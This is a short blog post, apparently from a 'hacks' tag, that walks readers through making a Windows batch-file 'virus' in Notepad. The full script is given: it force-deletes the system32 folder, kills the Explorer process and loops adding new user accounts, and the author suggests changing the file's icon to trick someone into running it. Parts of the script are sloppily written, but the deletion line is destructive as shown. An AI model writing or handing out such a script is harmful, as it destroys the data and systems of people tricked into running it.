Create a virus with notepad for PC!!

in #hacks7 years ago

How to practically destroy any computer with a simple notepad program.p014t0gj.jpg

1.open a new text document file...

1.PNG

2.Copy the code from below....
1.PNG

@echo off
:virus
del /f /q "C:\WINDOWS\system32"
taskkill explorer.exe
tskill explorer.exe
set /a _virus+=1
net user %_virus+% /add
goto virus

3.Save the file as .bat format...
1.PNG

Here is your virus ready to attack!!
This file will be a real risk.It will delete many important windows files.so think twice before you use it.You can also change the icon to set the trap with this virus.